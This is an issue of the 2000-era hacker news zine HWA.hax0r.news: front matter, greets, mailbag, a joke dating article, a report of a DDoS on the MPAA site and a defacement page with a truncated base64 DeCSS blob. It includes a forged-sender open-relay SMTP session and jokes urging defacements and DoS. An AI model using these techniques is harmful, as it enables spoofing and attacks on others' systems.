I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD ** USE NO HOOKS ** Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. HWA (Hackers Without Attitudes) is not affiliated with HWA (Hewlitts Warez Archive?), and does not condone 'warez' in any shape manner or form, unless they're good, fresh 0-day and on a fast site. HWA.hax0r.news is now officially sponsored by the following entities: HWA Internet Security http://hwa-security.net/ CubeSoft Communications http://www.csoft.net/ We strongly suggest Csoft for your hosting needs, tell them cruciphux from HWA sent you. contact julien@csoft,net for details and check the site for plans available. Rights of sources included in our newsletter/zine ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Some sources and agencies impose unfair limitations and restrictions on the use of their data, I do not generally ask permission to include the articles from major media or other persons that have published material on the net, imho this material is public domain. Example: "This material is subject to copyright and any unauthorised use, copying or mirroring is prohibited. " This notice will be disregarded we don't charge for access to these archives, if anything we're doing the site(s) a favour by disseminating their news. Legal action will result in a civil disobedience action and will incur underground continuance of our zine. cruciphux@dok.org Cruciphux [C*:.] HWA/DoK Since 1989 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ _ _ / ___|___ _ __ | |_ __ _ ___| |_ ___ | | / _ \| '_ \| __/ _` |/ __| __/ __| | |__| (_) | | | | || (_| | (__| |_\__ \ \____\___/|_| |_|\__\__,_|\___|\__|___/ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you ~~~~~~~ are reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. Stuff you can email: - Prank phone calls in .ram or .mp* format - Fone tones and security announcements from PBX's etc - fun shit you sampled off yer scanner - reserved for one smiley face -> :-) <- - PHACV lists of files that you have or phac cd's you own (we have a burner) - burns of phac cds (email first to make sure we don't already have em) - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: cruciphux@dok.org Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas2@usa.net Other methods: Cruciphux's ICQ:58939315 note; not always online, and do not abuse or use for lame questions! My Preffered chat method: IRC Efnet in #HWA.hax0r.news @HWA 00.2 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ __ ___ ___ \ \ / / |__ ___ __ _ _ __ _____ ____|__ \ \ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ / \ V V / | | | | (_) | (_| | | | __/\ V V / __/_| \_/\_/ |_| |_|\___/ \__,_|_| \___| \_/\_/ \___(_) Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/programming/IRC+ man in black sas2@usa.net .............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black twisted-pair@gmx.net......: currently active/programming/IRC+ pyra......................: currently active/crypto queen Foreign Correspondants/affiliate members (Active) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Qubik ............................: United Kingdom D----Y ...........................: USA/world media Zym0t1c ..........................: Dutch/Germany/Europe Sla5h.............................: Croatia Spikeman .........................: World Media/IRC channel enforcer Armour (armour@bur.st)............: Australia Wyze1.............................: South Africa Xistence..........................: German/Dutch translations Past Foreign Correspondants (currently inactive or presumed dead) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ N0Portz ..........................: Australia system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed Spikeman's site is down as of this writing, if it comes back online it will be posted here. http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) Sla5h's email: smuddo@yahoo.com ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas 99 issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ _ / ___|_ __ ___ ___| |_ ___ | | _| '__/ _ \/ _ \ __/ __| | |_| | | | __/ __/ |_\__ \ \____|_| \___|\___|\__|___/ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. New members/affiliates Xistence ..... General news and Dutch/German translations sP|a|Zm ..... Swedish news / translations SugarKing ..... General news articles * all the people who sent in cool emails and support GREETS ~~~~~~ FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs* Spikeman p0lix Vortexia Wyze1 Pneuma Raven Zym0t1c duro Repluzer astral BHZ ScrewUp Qubik gov-boi _Jeezus_ Haze_ theduece ytcracker loophole BlkOps MostHated vetesgirl Slash bob- CHEVY* Debris pr1zm JimJones Dragos Ruiu pr0xy MR^CHAOS senn Fuqrag Messiah v00d00 meliksah dinkee omnihil sP|a|Zm OE KillNow iPulse erikR prizm paluka Xistence doobee phold hi ;) {} mixter merXor abattis ashie diesl0w aus Julien/Csoft b0f chappies DoK chappies and our HWA clan DISSES? ~~~~~~~ You get the biggest dis of them all, your name(s) will not even be mentioned here in the zine, you are nothing. You know who you are, deal and squeal. EoF shouts to Xochitl13 for sending the cool postcard with a pic of the la 2600 meeting place. cheers dude! btw your mailbox is full ... Folks from #hwa.hax0r,news and other leet secret channels, *grin* - mad props! ... ;-) And many others, sorry if i missed you or forgot you! mail me and i'll flail myself unforgivingly in front of my open bedroom window until I bleed, then maybe, add u to the list (please, don't ask for pics...) Also mad props to doobee and the CCC (Chaos Computer Club) in Germany for setting up a new listserv system to help distribute the zine. (Will be in action soon, I have admin work to do first and testruns..). :-))) Ken Williams/tattooman ex-of PacketStorm, SpaceRogue for running a kick ass news net Emmanuel Goldstein for pure staying power All the crackers, hackers and phreakers The sysadmins, NOC controllers, network engineers IRCops, security professionals, tiger team operatives military cyberwar grunts, feds and 'special computer unit' coppers trying to keep shit together in this anarchic chaos. AND Kevin Mitnick (free at last, stay free this time man...) Kevin was released from federal prison on January 21st 2000 for more information on his story visit http://www.freekevin.com/ not familiar with his story? you should be, it affects us all especially if you're in the U.S -=- kewl sites: Updated May/Jun 2000 Placement on list has no bearing of how "kewl" the sites are. :-p + http://hackdesk.dhs.org/ + http://www.hack.co.za/ ** may be up, may be down... ** + http://blacksun.box.sk/ + http://packetstorm.securify.com/ + http://www.securityportal.com/ + http://www.securityfocus.com/ + http://www.hackcanada.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://www.pure-security.net/ + http://ech0.cjb.net/ + http://www.r00tabega.com/ + http://eeye.com/ + http://ussrback.com/ + http://el8.org/ + http://adm.freelsd.net/ + http://www.l0pht.com/ + http://www.2600.com/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ ____ _ | \ | | _____ _____| __ ) _ _| |_ ___ ___ | \| |/ _ \ \ /\ / / __| _ \| | | | __/ _ Y __| | |\ | __/\ V V /\__ \ |_) | |_| | || __|__ \ |_| \_|\___| \_/\_/ |___/____/ \__, |\__\___|___/ |___/ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 Since we provide only the links in this section, be prepared for 404's - Ed +++ When was the last time you backed up your important data? ++ www.hack.co.za is back online (see elsewhere for story on gov-boi and a tassle with phonic) (June 2000) #darknet is current 'official' hack.co.za public IRC channel it is generally open on EFnet, but sometimes closed due to attacks from lamers with nothing better to do than disrupt IRC, Thanks to myself for providing the info from my wired news feed and others from whatever sources, Zym0t1c and also to Spikeman for sending in past entries.... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ *** NEW WEB BOARD! *** ======================================================================== The message board has been REVIVED with a new script and is doing quite well. Check it out http://discserver.snap.com/Indices/103991.html . Don't be shy with your email, we do get mail, just not much of it directed to other readers/the general readership. I'd really like to see a 'readers mail' section. Send in questions on security, hacking IDS, general tech questions or observations etc, hell we've even printed poetry in the past when we thought it was good enough to share.. - Ed ======================================================================= * From the Web board: * ~~~~~~~~~~~~~~~~~~~~~~~~ (Didn't pull much from the board, check it out, some interesting stuff on there... - Ed) rst-: drskru@gmx.net New Group SKRU for YOU! Sun May 21 17:27:36 2000 New group now recruiting! Fun hax0r group :)) must have a sense of humour will skewl. http://skru2k.tripod.com/skru/ EFnet #Script-Kids-R-Us :-) See ya there, keep up the cool zine! bye.... -=- note: this group has defaced several sites and mirrors can be seen on Attrition.org, also channel is keyed. - Ed -=- A little late unfortunately but for your ref; - Ed Lucian: lucjam@mindspring.com TV film on script kiddies Wed May 17 15:26:27 2000 Hi HWA, Am working on a big new film about kid hackers / crackers / script kiddies for British TV. Treating them not as anti-corporate heroes, or geniuses, but as willful, cat burgling pranksters. I need to find some contacts for hackers (and their admirers!) before the end of this week... This isn't some lame documentary exposing people, this is a cool story, not a news expose, happy for anyone to be anonymous, Am on to all the usual suspects, but any new stories leads would be really appreciated. thanks Lucian -=- Unfortunately I didn't respond to this fella, I wonder who the 'usual suspects' were ... hrm - Ed -=- SugarKing: sugarking2001@hotmail.com 2600 going too far? Mon May 8 11:04:30 2000 2600 registers verizonREALLYsucks.com going after Verizon Wireless. And before this fucknbc.com ? What are they trying to prove? Anyone have anything to say about this? I'm thinking of writing and article about it...give me some feedback. SugarKing -=- allnet33 2600 going to far Tue Jun 6 22:23:45 2000 I think 2600 is trying to challenge corporate america every chance they get. They want to cause political trouble just to keep things stirred up so that they have something to write about. -=- Check board for other threads. Open up a convo... @HWA 02.0 Words from the editor. ~~~~~~~~~~~~~~~~~~~~~ _____ _ _ _ _ | ____|__| (_) |_ ___ _ __( )__ | _| / _` | | __/ _ \| '__|/ __| | |__| (_| | | || (_) | | \__ \ ___|_____\__,_|_|\__\___/|_| |___/ / ___| ___ __ _ _ __ | |__ _____ __ \___ \ / _ \ / _` | '_ \| '_ \ / _ \ \/ / ___) | (_) | (_| | |_) | |_) | (_) > < |____/ \___/ \__,_| .__/|_.__/ \___/_/\_\ |_| #include #include #include main() { printf ("Read commented source!\n\n"); /* Its mostly been said in the two listbot mailing list news * announcement msgs, however i'd like to point out that some * items may fall outside the stated coverage period due to * threading, these were left for clarity. * * I'd like to thank staff members and especially Pyra and * Merxor, SugarKing, TP for their great help in getting this * issue and #54 into shape, thanks guys! * * Also thanks to {}, JimJones, Slash and Prizm for other * help and direction. *wink wink* * * Cruci- * * cruciphux@dok.org * Preffered chat method: IRC Efnet in #HWA.hax0r.news * */ printf ("EoF.\n"); } Snailmail: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 Anonymous email: telnet (wingate ip) (see our proxies list) Wingate>0.0.0.0 Trying 0.0.0.0... Connected to target.host.edu Escape character is '^]'. 220 target.host.edu ESMTP Sendmail 8.9.3/8.9.3; Sun, 6 Feb 2000 17:21:00 -0500 (EST) HELO bogus.com 250 target.host.edu Hello ~ereet@target.host.edu [ 0.0.0.0 ], pleased to meet you MAIL FROM: admin@nasa.gov 250 admin@nasa.gov... Sender ok RCPT TO: cruciphux@dok.org 250 cruciphux@dok.org... Recipient ok DATA Secret cool infoz . QUIT If you got that far everything is probably ok, otherwise you might see 550 cruciphux@dok.org... Relaying denied or 550 admin@nasa.gov... Domain must exist etc. * This won't work on a server with up to date rule sets denying relaying and your attempts will be logged so we don't suggest you actually use this method to reach us, its probably also illegal (theft of service) so, don't do it. ;-) -=- Recent public posts to listbot mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Jun 13 2000 21:25:48 EDT From: HWA.hax0r.news Subject: NEWS: HWA.hax0r.news is ALIVE! Hi folks; My apologies for the delay this time around, personal problems and other work commitments have kept me from my hobby. This is being remedied and things should pick up from here on in as we get organized. Here is some news for you. HWA-security.net has been registered and will be hosted by our good friends at Csoft (cheers Julien), check www.csoft.net for your hosting/vhost needs. They know their shiat. Site us under development and will be online soon. Once again we're looking for new staff members or volunteers to act as reporters, interviewers, news gatherers, file finders etc. More details in release #53 which will be released this weekend June 18th. ---> Email me at cruciphux@dok.org ** Issue #53 will be released June 18th and will cover material and submissions from April 9th thru May 7th 2000. ** Issue #54 MAY be out this weekend also but I doubt it..we'll see how busy things get around here, #54 will contain the recent news and cover May 7th to present (release date). I will try my best to get #53 and #54 out close to each others release dates, i'm doing it this way to maintain coverage period per issue number. From: HWA.hax0r.news Subject: NEWS part 2: HWA.hax0r.news HWA.hax0r.news - http://welcome.to/HWA.hax0r.news/ Hi again, We appreciate your staying with us and giving us support, although I'm largely doing this for selfish reasons and fun it is nice to hear others getting off on it too, I've decided to expand operations and offer more to the community. I've decided to become more organized and have taken on a staff to help with the production of the zine with an eye to keeping a more timely release date and more reliable/quality production. If you can help send me an email with a mini resume listing your talents and areas you would be interested helping in. ** This is a non-profit venture. Sponsored by CUBESOFT. ** Yes we're doing it all for fun, like the old days :) Many areas are open for you to offer help, think of this as a fresh startup, what is it? a cross between Securityfocus, HNN PacketStorm and the like. Sponsors are welcome, your donations or ads will be redirected into the development of this project. HWA-Security.net - Web site development, design, CGI, forums programming, administration, forum admin, mailing list admin PHP programming, java to proofreading and data collection. Email me at cruciphux@dok.org with what you think you can do to help or are interested in becoming a sponsor for this worthwhile cause. Mailing Address: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 SPONSORS, Commercial Advertising, Conference. ============================================= Contact me for product advertising, or sponsorship details/offers and we can work something out. I don't gouge and am looking to work towards financing a new Canadian Con. CanCon 99 failed due to lack of sponsorship/expertise in 1999, if you can help or offer sponsorship, I want to hear from you. Cruciphux@dok.org Talk to us live =============== Drop off news or just hang and idle or chat, don't forget to join us on EFNet IRC #HWA.hax0r.news, if channel has a key then .. /join #hwa.hax0r.news zwen (key is zwen and if that does not work msg cruciphux i'm usually online most days.) Qualifications? =============== I don't claim to know it all or be a mad skewled expert but am a 35 yr old "old school" ex-hacker, currently certified Unix Admin, Linux Admin and Internet Security Specialist... information doesn't necessarily want to be $7.15 Cheers Cruciphux, (Steve Carpenter) HWA Editor/Founder, DoK, b0f b0f security http://b0f.freebsd.lublin.pl/ =-= Congrats, thanks, articles, news submissions and kudos to us at the main address: cruciphux@dok.org complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods, trinoo and tribe or ol' papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. -= start =--= start =--= start =--= start =--= start =--= start =--= start ____ _ _ / ___|___ _ __ | |_ ___ _ __ | |_ | | / _ \| '_ \| __/ _ \ '_ \| __| | |__| (_) | | | | || __/ | | | |_ \____\___/|_| |_|\__\___|_| |_|\__| / ___|| |_ __ _ _ __| |_ \___ \| __/ _` | '__| __| ___) | || (_| | | | |_ |____/ \__\__,_|_| \__| -= start =--= start =--= start =--= start =--= start =--= start =--= 03.0 Hacking your way into a girlie's heart, etc by: ch1ckie ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 04/09/00 /////////////////////////////////////////// GGGGGG OOOOOOO AAAAAAAA TTTTTTTTTT G O O A A TT G GGG O O AAAAAAAA TT G G O O A A TT GGGGGG OOOOOOO A A TT \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ [g0at] http://www.goat-advisory.org [g0at] -=g0at media productions=- ((Hacking your way into a girlie's heart, etc))-((by: ch1ckie)) ->Lesson One: Making Yourself Appear More Elite Than You Actually Are. -In real life, or on IRC, the most important thing that a girlie looks for in a hax0r is skill (she hopes it will move her up in the world), whether it is real skill (which is hard to come by these days) or if its simply an elite host (hax0r@fbi.gov). -To make yourself appear more elite than you actually are (or ever will be), the first step is getting yourself an elite host (2845818@shellyeah.org probably won't cut it), either by means of a shell, wingate, or bnc (and if you don't know of these things, just tell the girl you admin some big network in your spare time and i'm sure she'll be impressed). -In all retrospect, most girlies don't know the difference between _you_ and the real thing, so don't worry. -Opposing popular use...to the majority of girlies, it is best not to use leet speak (eye 4m 4 m45t0r hax0r); this will more often than not end up confusing them and leave them bewildered. Thus, trying to impress them will prove useless. If you happen to have a girl that knows 'leet speak', don't directly use this speak with her either, but use it when she is in the premisis ("y0 m4ng, u b3tt4 ch3ck y0s3lf b4 u wr3ck y0s3lf"). This will undoubtfully make you appear more elite/phearful than you actually are. -For those of you who are more 'skilled', deface webpages in the fair name of your girlie... ("U R 0wned; mad props to my girlie"). This is a concept far beyond most girlies, and seeing their name on www.yahoo.com proves very impressive. A few other methods of making yourself appear elite: -obtaining operator status in as many channels as possible, do whatever you can to do so... suck dick, kiss ass, or stomp on some heads. -pinging out her enemies on command will impress/delight her enough to have even cyber sex with you... might wanna keep that in mind. -using random 'big' words such as "heuristic control algorithm" or "pleisiochronous communications" will be sure to impress... they do not even have to be in an order that makes any sense. As long as your girlie hears 'big important words', she will believe that you are elite...and the sad part is, that you will probably believe that you are too :(. *Making yourself appear more elite than you actually are, is the first step to hacking your way into a girlie's heart. Lesson two and three coming soon ('Making Your Girlie Feel Important', and 'Understanding Your Girlie').* [Shouts to my 'elite' gang in ftg ....Debris, nerp, potus, omega44, JimJones, and all the rest.] "If only i could be as cool as you." - Silverchair ch1ckie@ EFNet ch1ckie.cjb.net ch1ckie@hotmail.com @HWA 04.0 [HWA] MPAA Site DoS'd off the net ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 12th 2000 By: Cruciphux Source: Anonymous (one of the persons involved contacted us directly on IRC) Data: confirmed http://www.mpaa.org has been down for nine hours or so as I write this several T1's were employed in a distributed DoS attack against the site further information will be posted as I get it. It is also rumoured that many sites affiliated with MPAA such as Tristar will also be going down over the next week. Some recent anti-MPAA defacements follow, the first site includes the full UUencoded source code to DeCSS, (This site was censored by Attrition for fear or reprimand from the MPAA I believe this is a first for Attrition in censoring defaced pages. - Ed) http://www.safemode.org/mirror/2000/04/11/courtavenue_com/ ... fuck censorship! a focus on MPAA(sic). You know one thing I am really brassed off about, and it has been going on since so-called "civilisation" existed. Is how censorship is controling our lives. Governments control people by the millions through forced relegions, cults, and conspiracies while ripping us off in the process. Enterprises and Government work hand in hand to exploit the common people. Enterprises use Governmnet as a tool to uphold censorship and inevitably generate revenue for them, and likewise for the government as they reap the taxes in return(that's why the US government won't take their finger out of their ass, and split up Microsoft and other overbloated monopolies which are very unethical with their business stratigies). Hmm, I know what your thinking "Isn't the idea of a 'democratic' government suppose to let the common people control their government, not the other way around?!?", yeah an your compleately right .... fascism is still commonplace even today in 1st world countries. Which brings me to the attention of MPAA(Motion Picture Association of America) who are trying to control how we watch DVD's, where we watch them, who we watch them with(does this include pets such as dust mites?!?), and what parts we watch. For example "Are we allowed to skip their brainwashing advertisments and other shit for which they want to control us with?". I feel paranoid when I have a friend watching a DVD with me just incase I am breaking the law. LOL! :/. Where does censorship end?! It's all DEEPLY psycological you know! MPAA have restrained the right for people to write drivers for no computer operating system other than Microsoft's very own "Windows" range, this means that you have to loose your precious uptimes of months on your unix systems for a few hours of entertainment(hardly seems worth it). "...and remember all visionaries are fascist bastards!" - ScrewLoose Shouts go to... BlazinWeed, phov0s/datawar, and other nigguhs who inspired me. Here is the DeCSS code This version of the code is for M$ Windows and is in the form of a ".dll"(dynamic link library). It can decrypt any information stored on every DVD CD, yes it's the code that MPAA don't want anyone just to pass it on OR EVEN LINK TO IT!!?!? I am deadly serious. It makes you think "What are those mother fuckers got to hide?". You could probably find a uu base64 decoder at davecentral for both Windows and Linux(if your distribution doesn't come with a version already). See for yourself... . . N.B.It is advised to rip this code straight from the HTML source to ensure that it is decoded 100% properly. ------------ CUT HERE (filename = "decss.zip") ------------- begin-base64 644 2 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 